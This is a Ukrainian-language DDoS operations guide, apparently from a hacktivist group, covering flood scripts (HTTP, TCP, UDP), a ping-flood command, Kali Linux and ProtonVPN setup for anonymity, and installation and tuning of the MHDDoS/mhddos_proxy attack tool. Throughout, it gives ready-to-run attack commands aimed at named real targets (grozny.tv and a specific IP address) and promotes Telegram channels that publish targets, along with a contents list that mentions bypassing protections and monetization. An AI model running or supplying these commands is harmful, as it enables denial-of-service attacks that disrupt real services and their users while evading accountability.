│   │   │ └─►py http_s.py -t www.site.com -i 123.123.123.123 -p 8080 -f /page -w 250 -s 100
│   │   └─►Інші
│   │     └─►python3 http_s.py -t www.site.com -i 123.123.123.123 -p 8080 -f /page -w 250 -s 100
│   ├─►tcp.py
│   │ ├─►-i <Ціль (домейн чи IP адреса)> (обов'язково)
│   │ ├─►-p <Порт> (обов'язково)
│   │ ├─►-w <Кількість імітованних ботів> (не обов'язково)
│   │ │ ├─►Якщо не вказувати - автоматично ставиться на 100
│   │ │ └─►Приклад
│   │ │   └─►-w 500 (чим більше - тим більша нагрузка на комп'ютер та інтернет)
│   │ └─►Приклад використання
│   │   ├─►Windows
│   │   │ └─►py tcp.py -i 123.123.123.123 -p 80 -w 250
│   │   └─►Інші
│   │     └─►python3 tcp.py -i 123.123.123.123 -p 80 -w 250
│   ├─►udp.py
│   │ ├─►-i <Ціль (домейн чи IP адреса)> (обов'язково)
│   │ ├─►-p <Порт> (не обов'язково)
│   │ │ └─►Якщо не вказувати - порти будуть перебиратися автоматично (для більшої ефективності)
│   │ ├─►-w <Кількість імітованних ботів> (не обов'язково)
│   │ │ ├─►Якщо не вказувати - автоматично ставиться на 100
│   │ │ └─►Приклад
│   │ │   └─►-w 500 (чим більше - тим більша нагрузка на комп'ютер та інтернет)
│   │ └─►Приклад використання
│   │   ├─►Windows
│   │   │ └─►py udp.py -i 123.123.123.123 -p 80 -w 250
│   │   └─►Інші
│   │     └─►python3 udp.py -i 123.123.123.123 -p 80 -w 250
│   └─►port scanner.py
│     └─►Приклад використання
│       ├─►Windows
│       │ └─►py "port scanner.py"
│       └─►Інші
│         └─►python3 port\ scanner.py
└─►Я (RiX), як автор даних скриптів не несу відповідальності за їх використання у тих, чи інших цілях.

Повний гайд

1. Введення
2. Базова теорія
3. Методи DDOS атак
4. Вибір обладнання для атак DDOS
5. Налаштування обладнання для DDOS атак
6. Види захисту та як їх обходити
7. Безпека та анонімність
8. Методи монетизації
9. Інші плюшки
10. Контакти, хости, корисні посилання, матеріал та ін.

Звантажити у форматі PDF:

На кацапський: DDOS-manual.pdf

На англійській: англDDOS-manual.pdf

Інфо-довідник Кібер-Козаків

Оновлюємо пакети та качаємо усе потрібне:

pkg update
pkg upgrade
pkg install python3
pkg install git
apt update
apt upgrade
sudo apt install python3
sudo apt install git
brew update
brew upgrade
sudo brew install python3
sudo brew install git
choco update chocolatey
choco upgrade chocolatey
sudo choco install python3
sudo choco install git

Головні рівні:

1. Прикладний рівень – протокол верхнього (7-го) рівня мережевої моделі OSI, що забезпечує взаємодію мережі та користувача. Він дозволяє програмам користувача мати доступ до мережевих служб, таких як обробник запитів до баз даних, доступ до файлів, пересилання ел. пошти.
Типи даних:
дані
Опції:
доступ до мережевих служб Приклади: HTTP, Telnet, FTP, etc.
Приклади: HTTP/S
2. Транспортний рівень – 4-й рівень мережевої моделі OSI, призначений для доставки даних. При цьому не має значення, які дані передаються, звідки й куди, тобто він надає сам механізм передачі. Блоки даних він поділяє на фрагменти, розміри яких залежить від протоколу: короткі об’єднує в одні, а довгі розбиває.
Типи даних:
сегменти/дейтаграми
Функції:
прямий зв’язок між кінцевими пунктами та надійність
Приклади:
TCP/UDP
3. Мережевий рівень – 3й рівень мережевої моделі OSI (не актуальний), призначена для визначення шляху передачі даних. Відповідає за трансляцію логічних адрес та імен у фізичні, визначення найкоротших маршрутів, комутацію та маршутизацію, відстеження неполадок та заторів у мережі.
Типи даних:
пакети
Функції:
пизначення маршруту та логічна адресація
Приклади:
ICMP, GRE та ін.

Протоколи:

Коротко:

HTTP – це з’єднання між клієнтом і сервером для передачі даних за протоколом HTTP. Підключення HTTP ідентифікується як <Вихідний IP, вихідний порт> та <Айпі приймача, порт приймача>.
TCP і UDP – це транспортні протоколи, які приймають дані від додатку (e.g. DNS резольвери, телеграм, веб-браузер). TCP – це про надійність, UDP – про простоту та швидкість

Детальніше (але не так детально як може бути детально із всіх детально):

HTTP – це протокол передачі даних, що використовується в комп’ютерних мережах. Назва скорочена від Hyper Text Transfer Protocol, протокол передачі гіпер-текстових документів Основним призначенням протоколу HTTP є передача веб-сторінок (текстових файлів з розміткою HTML), хоча за допомогою його з успіхом передаються і інші файли, як пов’язані з веб-сторінками (зображення і додатки), так і не пов’язані з ними (у цьому HTTP конкурує з складнішим FTP). HTTP припускає, що клієнтська програма — веб-браузер — здатна відображати гіпертекстові веб-сторінки і файли інших типів в зручній для користувача формі. Для правильного відображення HTTP дозволяє клієнтові дізнатися мову і кодування веб- сторінки і/або запитати версію сторінки в потрібних мові/кодуванні, використовуючи позначення із стандарту MIME. Цей протокол прикладного рівня, аналогічними йому явлются FTP і SMTP. Обмін повідомленнями йде по звичайній схемі «запит-відповідь». Для ідентифікації ресурсів HTTP використовує глобальні URI.
Детальніше: http://educational.mariroz.com/GlobalniInformatsijniMerezhi/lect/lect10.pdf
TCP (Transmission Control Protocol (Протокол керування передачею)) – протокол орієнтований на роботу з підключеннями і передає дані у вигляді потоків байтів. Дані пересилаються пакетами – TCP-сегментами, – які складаються з заголовків TCP і даних. TCP – “надійний” протокол, тому що в ньому використовуються контрольні суми для перевірки цілісності даних і відправлення підтверджень, щоб гарантувати, що передані дані прийняті без перекручувань.
Детальніше: http://elartu.tntu.edu.ua/bitstream/123456789/9607/2/Conf_2013v1_Radchuk_V-Printsip_roboti_protokolu_TCP_105.pdf
UDP – від протоколу TCP він відрізняється тим, що працює без встановлення з’єднання. UDP — це один з найпростіших протоколів транспортного рівня моделі OSI, котрий виконує обмін повідомленнями (датаграмами — англ. datagram) без підтвердження та гарантії доставки. При використанні протоколу UDP відповідальність за обробку помилок і повторну передачу даних покладена на протокол рівнем вище. Але попри всі недоліки, протокол UDP є ефективним для серверів, що надсилають невеликі відповіді великій кількості клієнтів
Детальніше: https://uk.wikipedia.org/wiki/UDP

Загальноприйняті схеми (протоколи) URL:

ftp — Протокол передачі файлів FTP
http — Протокол передачі гіпертексту HTTP
https — Спеціальна реалізація протоколу HTTP, що використовує шифрування (як правило, SSL або TLS)
mailto — Адреса електронної пошти
file — ім’я локального файлу

Види флуд-атак:

ICMP-флуд (Smurf атака) – один із самих опасніших флудів, дуже примітивний метод забивання смуги пропускання і створення навантажень на мережевий стек через монотонну посилку запитів ICMP ECHO (пінг). Легко виявляється за допомогою аналізу потоків трафіку в обидві сторони: під час атаки типу Icmp-флуд вони практично ідентичні.

Виконання:

# ping -i 0 -s 10000 -l 100 -q ya.ru

-i задає інтервал надсилання пакетів. Інтервал менше 200 мс дозволений тільки суперкористувачу. -s задає розмір пакету. Стандартний 54, найбільший 65507 байт. -l задає кількість пакетів що відправляються без очікування на відповідь, і -q робить так щоб утиліта вивела лише підсумки.

SYN-флуд – один з поширених способів не лише забити канал зв’язку, але і ввести мережевий стек операційної системи в такий стан, коли він вже не зможе приймати нові запити на підключення. Заснований на спробі ініціалізації великого числа одночасних TCP-з’єднань через посилку SYN-пакету з неіснуючою зворотною адресою. Після декількох спроб відіслати у відповідь ACK-пакет на недоступну адресу більшість операційних систем ставлять невстановлене з’єднання в чергу. І лише після n-ї спроби закривають з’єднання. Оскільки потік ACK-пакетів дуже великий, незабаром черга виявляється заповненою, і ядро дає відмову на спроби відкрити нове з’єднання. Найрозумніші DoS-боти ще й аналізують систему перед початком атаки, щоб слати запити лише на відкриті життєво важливі порти.

UDP-флуд (Fraggle атака) – типовий метод захаращення смуги пропускання. Заснований на нескінченній посилці udp-пакетів на порти різних udp-сервісів.

HTTP-флуд (Ping флуд) – один з найпоширеніших на сьогоднішній день способів флуду. Заснований на нескінченному посиланні http-повідомлень GET на 80-й порт із метою завантажити web-сервер настільки, щоб він виявився не в змозі обробляти всю решту запитів. Часто, метою флуду стає не корінь web-сервера, а один із скриптів, що виконують ресурсоємні завдання або що працює з базою даних. У будь-якому разі, індикатором атаки, що почалася, служитиме аномально швидке зростання логів web-сервера.

Методи запросів:

POST призначений для запиту, при якому веб-сервер приймає дані збережені в тілі повідомлення, для зберігання. Метод часто використовується для завантаження файлу або передачі заповненої веб-форми. На відміну від POST, метод GET призначений для отримання інформації від сервера.

Автоматичний MHDDoS від IT ARMY

  • Не потребує VPN – автоматично скачує і підбирає робочі проксі для заданих цілей, періодично їх оновлюючи
  • Атака декількох цілей одночасно з автоматичним балансуванням навантаження
  • Використовує різні методи для атаки і змінює їх в процесі роботи
  • Простий та зрозумілий інтерфейс з іменованими параметрами

Все дуже просто:

  1. Завантажте останню версію програми для вашої платформи:

  2. Запустіть файл
  3. Усе!

 

Якщо в вас є встановлений Docker, запустіть:
				
					docker run -it --rm --pull always --net=host ghcr.io/porthole-ascend-cinnamon/mhddos_proxy --lang UA				
			

Setup

Kali Linux&ProtonVPN

Підготовка віртуального робочого середовища з ОС Kali Linux&ProtonVPN

Разом ми підготуємо віртуальне середовище з використанням VirtualBox, розгорнемо віртуальну ОС kali linux, підключимо безкоштовний protonVPN і нарешті запустимо команду для DDoS’a.

Встановлення VirtualBox для Windows

Тут все просто, переходимо за посиланням, натискаємо «Windows hosts», завантажуємо .exe файл і встановлюємо (у діалогових вікнах скрізь «Далі»).

Розгортання віртуальної машини Kali Linux

Спочатку потрібно завантажити образ операційної системи Kali Linux. Для цього переходимо за посиланням та у правій іконці VirtualBox клацаємо на «torrent», завантажуємо образ у зручну папку.

Після завантаження образу, відкриваємо директорію з розташуванням завантаженого файлу, натискаємо правою кнопкою миші по завантаженому файлу -> Відкрити за допомогою -> VirtualBox

Змінюємо папку машини (там будуть зберігатись дані під час роботи віртуальної Kali Linux), натискаємо «Імпорт» і чекаємо до закінчення процесу.

Далі у VirtualBox натискаємо «Налаштувати» та виділяємо ресурси вашої основної системи (у межах зеленого повзунка) ОЗУ та Процесора.

Закриваємо, вибираємо нашу віртуальну машину та клацаємо запустити.

Встановлення VPN-з’єднання з protonVPN

Входимо на робочий стіл віртуальної ОС з використанням логіну та паролю «kali»

Чекаємо якийсь час, поки система завантажиться і відкриваємо Terminal, вводимо по черзі наступні команди для встановлення пакетів сервісу openvpn:

  • sudo apt install openvpn
  • sudo apt install network-manager-openvpn-gnome

Далі, відкриваємо браузер (Mozilla Firefox) у лівому кутку верхньої панелі

Гуглимо protonvpn або переходимо за посиланням та реєструємось на сайті

Після реєстрації в лівій панелі переходимо на вкладку “Завантаження”, заповнюємо чек-бокси платформу “GNU/Linux”, Протокол “UDP”, “Конфігурації безкоштовних серверів”

Далі за списком вибираємо найменш завантажений сервер (у відсотковому співвідношенні) та натискаємо «Завантажити». Як приклад ми вибираємо «US-FREE#6» так як на момент написання статті він є найменш завантаженим (83%).

У спливаючому вікні вибираємо Save file

Чудово! Конфігурацію VPN-сервера створили та зберегли, тепер потрібно її застосувати. Для цього клацаємо на іконку Ethernet-порту в правому кутку верхньої панелі і вибираємо “VPN Connections” і “Add a VPN connection”, з’явиться таке спливаюче вікно:

У спливаючому вікні вибираємо “Import a saved VPN configuration” і натискаємо кнопку “Create”

У провіднику переходимо в директорію “Downloads”, виділяємо наш раніше завантажений файл і натискаємо “Open”

Далі в браузері з нашим акаунтом в protonVPN знаходимо вкладку «Акаунт» і гортаємо до поля «Ім’я користувача OpenVPN/IKEv2» ці дані копіпастим у вікно налаштування VPN-з’єднання, що з’явилося:

З’явиться нове вікно для введення пароля, пароль придумайте та запам’ятайте

Далі знову натискаємо іконку Ethernet-порту, VPN-connections і вибираємо наше VPN-з’єднання

Після завершення всіх маніпуляцій, у правому верхньому кутку з’явиться відповідне повідомлення

На цьому маніпуляції з побудовою VPN-з’єднання завершено, рухаємось до фінальних етапів! Можна закрити непотрібні термінали/вікна браузерів

Фінал, підключаємось до ботнету

Для того, щоб підключитися до кіберфронту та запускати DDoS-атаки, Вам тепер потрібно просто встановити у вашу підготовлену Kali Linux засоби для атаки!

Туторіали з них вже підготовлені за посиланням

Підготував Український Жнець

  • Наш Telegram-канал #Тут публікуємо цілі, готуємо для Вас команди для атаки та викладаємо нові гайди
  • Наш Telegram-чат #Вам тут допоможуть включити компуктер і стати українським жнецом, якого бояться всі російські веб-сервіси.

Удачі, панове та Слава Україні

MHDDoS_Proxy (kali, docker)

Привіт, кіберслов’яни!

Що ви отримуєте, використовуючи цей скрипт:

  • Перелік провайдерів з набором проксі-серверів у кількості близько 35 000 інстансів (на момент написання статті).
  • Можна атакувати відразу кілька цілей (скрипт сам розподілить навантаження)
  • Менше помилок та багів
  • Зрозуміліший синтаксис при написанні команд атаки

Встановлюємо на Kali Linux

Запускаємо нашу віртуальну Kali Linux (ЯКУ МИ НАЛАШТУВАЛИ В ЦЬОМУ ГАЙДІ) та відкриваємо Terminal. Насамперед підвищимо наші привілеї до root-користувача

  • sudo su #Переходимо до root-користувача, пароль за замовчуванням «kali»
  • rm -rf MHDDoS #(Якщо в вас був просто MHDDos)Видаляємо директорію разом з усіма файлами MHDDoS

Далі клонуємо наш прокачений скрипт із гітхабу наступною командою:

  • git clone https://github.com/porthole-ascend-cinnamon/mhddos_proxy.git

Тепер переходимо в директорію нашого скрипту та підвантажуємо головну тулзу для атак MHDDoS наступним чином:

  • cd mhddos_proxy #Переходимо в директорію щойно завантаженого скрипту
  • git clone https://github.com/MHProDev/MHDDoS.git #Клонуємо MHDDoS

Далі нам потрібно підвантажити файл requirements.txt, але для початку встановити python3-pip. Зробити це можна такими невигадливими командами:

  • apt update #Збираємо всі пакети, доступні для оновлення
  • apt install python3-pip #Встановлюємо потрібний нам пакет

Коли запитують “так чи ні”, ми вибираємо “так”, вводячи “Y”

Чекаємо завершення установки та переходимо до фінального кроку «тюнінгу» MHDDoS. Встановлюємо requirements.txt наступною командою:

  • python3 -m pip install -r MHDDoS/requirements.txt

Готово! Тепер у нас на руках прокачений MHDDoS, як ним тепер користуватися?

Атака на Layer 7 (Рівень додатків)

Атаку на цьому рівні можна провести успішно, якщо ви знаєте, який засіб “захисту” використовується і для даного засобу є метод атаки в самому MHDDoS (Наприклад, cfb для Cloudflare, dgb для DDoS-Guard, і т.д.)

Шаблон команди (VPN не вимагається):

  • python3 runner.py <Ціль> --http-methods <Метод> -t <Запити> --rpc <Підключення> -p <Оновлення> --debug

Де:

  • Ціль – це посилання у форматі https://example.com
  • Метод (–http-methods) – Один з методів MHDDoS (CFB, DGB, BYPASS, GET і т.д
  • Запити(-t) – Кількість “зловмисних” запитів/пакетів на ціль.
  • Підключення(–rpc) – Кількість запитів, що надсилаються на 1 проксі-сервер, після чого проксі-сервер транслює ці запити на ціль.
  • Оновлення(-p) – Період часу в секундах, через який ваше з’єднання з проксі-серверами оновлюватиметься (проксі-сервери мають властивості падати, скидати з’єднання тощо). За промовчанням 300 секунд.
  • –debug – Потрібний для того, щоб ми бачили лог атаки.

Фінальна команда на ціль https://grozny.tv/ виглядатиме так:

  • python3 runner.py https://grozny.tv/ --http-methods dgb -t 1000 --rpc 100 -p 300 --debug

Після запуску потрібно якийсь час почекати (близько 1-2 хвилин), поки встановиться з’єднання з проксі-серверами.

Атака на Layer 4 (Транспортний рівень, p2p)

Атака на цьому рівні може бути успішною, якщо у вас на руках є сервери мети, що атакуються, які знаходяться за “захистом”. У такому разі ви атакуєте сервер безпосередньо за ip-адресою. По синтаксису тут все так само, як і на Layer 7 тільки ціль потрібно вказувати в іншому форматі:

Для атаки TCP Flood (VPN не вимагається):

Вказуємо цілі у форматі tcp://IP:port, а ключі –http-methods вказуємо TCP, приклад команди:

  • python3 runner.py tcp://87.226.162.181:80 -t 1000 -p 300 --rpc 50 --http-methods TCP --debug

Для атаки UDP Flood (VPN обов’язковий):

Вказуємо цілі у форматі udp://IP:port, а у ключі –http-methods вказуємо UDP, приклад команди:

  • python3 runner.py udp://87.226.162.181:80 -t 1000 -p 300 --rpc 50 --http-methods UDP --debug

Docker

Якщо у вас встановлено docker, можна запускати атаку через mhddos_proxy, використовуючи docker. Синтаксис практично нічим не відрізняється, хіба що перед кожною “дефолтною” командою потрібно додати docker run -it –rm portholeascend/mhddos_proxy, виглядатиме ця буде приблизно таким чином:

Layer 7:

  • docker run -it --rm portholeascend/mhddos_proxy https://grozny.tv/ –http-methods dgb -t 1000 –rpc 100 -p 300 –debug

Layer 4(TCP):

  • docker run -it --rm portholeascend/mhddos_proxy tcp://87.226.162.181:80 -t 1000 -p 300 –rpc 50 –http-methods TCP –debug

Layer 4(UDP):

  • docker run -it --rm portholeascend/mhddos_proxy udp://87.226.162.181:80 -t 1000 -p 300 –rpc 50 –http-methods UDP –debug

Як встановити Docker на Вашу ОС:

  • Windows: https://docs.docker.com/desktop/windows/install/
  • Mac: https://docs.docker.com/desktop/mac/install/
  • Ubuntu: https://docs.docker.com/engine/install/ubuntu/
  • Kali Linux: https://www.kali.org/docs/containers/installing-docker-on-kali/

Завантажити останній образ mhddos_proxy можна наступною командою:

  • docker pull portholeascend/mhddos_proxy:latest

Оптимізація введення значень

Приклад команди:

  • python3 runner.py <Ціль> --http-methods <Метод> -t <Пакети> --rpc <Підключення> -p <Оновлення> --debug

Що можна додатково зробити:

  • Ціль – Цілі при проведенні атаки на одному рівні і з використанням одного методу атаки, зазначеного в –http-methods, можна перераховувати через пробіл. У цьому випадку кількість загроз будуть розділені на кожну мету рівномірно від тієї кількості, яку ви вказали.
  • Метод – З усіма методами можна ознайомитись  на самому гітхабі (розділ Features And Methods). Усі цілі, які ми готуємо в нашому каналі – ми готуємо вже з необхідними для атаки методами). На одному рівні атаки методи також можна перераховувати через пробіл.
  • Пакети– це кількість “шкідливих” пакетів/запитів, що відправляються на ціль. Тут можна викручувати по максимуму на стільки, на скільки тягне ваш ПК (моніторіть навантаження в диспетчері завдань, дивимося на ЦПУ та ОЗУ, у Kali Linux це зелений та синій графік відповідно). Будьте уважні, на початку атаки навантаження може бути мінімальним, а через деякий час зашкалювати. Враховуйте, що зі збільшенням пакетів/загроз, кількість проксі серверів може знизитися. За замовчуванням 1000, за бажанням – скільки влізе у вашу машину.
  • Підключення– Тут вказуємо передбачувану кількість підключень одного проксі-серверу. Оптимально вказувати від 50 до 100. Припустимо, що у Вас 1000 проксі-серверів, при вказівці підключень у кількості 50, Ви відправите 50 000 пакетів на вашу мету (в ідеалі, але певний відсоток пакетів швидше за все може загубитися). Не рекомендуємо викручувати значення, це навантажить проксі-сервера, пам’ятайте, що ними користуєтеся не тільки ви і вони не гумові).
  • Період атаки – Значення вказується в секундах, за замовчуванням це 300 секунд і це означає, що кожні 300 секунд ви оновлюватимете список проксі-серверів і перепідключатиметеся до них (деякі проксі могли забанити або з’єднання з ними може бути втрачено). Скрипт перезапускається автоматично, рекомендує вказувати тут не більше 10 хвилин, тому що чим частіше оновлюватимуться проксі, в розумних межах, тим краще.

Процес атаки:

  • PPS – кількість встановлених з’єднань із метою атаки.
  • BPS – вага цих пакетів у байтах, кілобайтах, мегабайтах. Оптимально коли BPS видайте показники не менше 500кБ, залежно від сайту, вашого інтернет-з’єднання та потужності Вашої машини іноді вичавлюється до 30 Мб, але це все суб’єктивно.
  • % – це просто хід вашої атаки, це час до оновлення проксі-серверів та перезапуску атаки у відсотках. Відсотки нічого спільного з ефективністю атаки не мають.

Готово! Тепер у Ваших руках нарізна кібер-рушниця :-)

Підготував Український Жнець

  • Наш Telegram-канал #Тут публікуємо цілі, готуємо для Вас команди для атаки та викладаємо нові гайди
  • Наш Telegram-чат #Вам тут допоможуть включити компуктер і стати українським жнецом, якого бояться всі російські веб-сервіси.

Удачі, панове та Слава Україні